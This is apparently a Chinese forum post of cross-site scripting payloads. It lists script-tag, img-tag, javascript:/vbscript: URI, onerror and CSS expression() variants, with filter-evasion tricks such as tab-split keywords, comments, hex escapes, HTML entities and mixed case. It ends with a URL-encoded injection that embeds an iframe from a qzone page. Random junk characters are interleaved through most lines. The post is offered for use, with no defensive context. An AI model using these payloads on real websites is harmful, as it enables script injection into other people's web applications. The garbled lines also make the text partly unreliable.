<script>alert("跨站")</script> (最常用)
5 H" f5 c5 N. k<img scr=javascript:alert("跨站")></img>2 W1 q; [6 H! N! }& z. v
<img scr="javascript: alert(/跨站/)></img>$ g5 d4 u; S1 R; M$ u# q1 _
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
8 I7 x9 r! E; g<img scr="#" onerror=alert(/跨站/)></img>
( I& @: e! A9 h9 c+ \6 d<img scr="#" style="xss:expression(alert(/xss/));"></img>+ J+ \: t' U- \$ {4 x9 J4 D2 M
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)) x9 Z: g9 g" U+ W
<img src=vbscript:msgbox ("xss")></img>
8 J. U! O" f4 Q4 l0 X3 N' X<style> input {left:expression (alert('xss'))}</style>7 c9 O- C b6 ]
<div style={left:expression (alert('xss'))}></div>
/ z( O* `8 Q C1 D<div style={left:exp/* */ression (alert('xss'))}></div>+ Y5 y0 V O, [. h. x
<div style={left:\0065\0078ression (alert('xss'))}></div>
7 o- ~9 n' R* m. p9 e- l! p, ahtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>2 m) `# F8 h$ b6 f$ o
unicode <div style="{left:expRessioN (alert('xss'))}">
5 u: |* ~2 g' u2 D8 M
! V @3 ~( |. O' s/ B"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["% A p# R K, `" B
|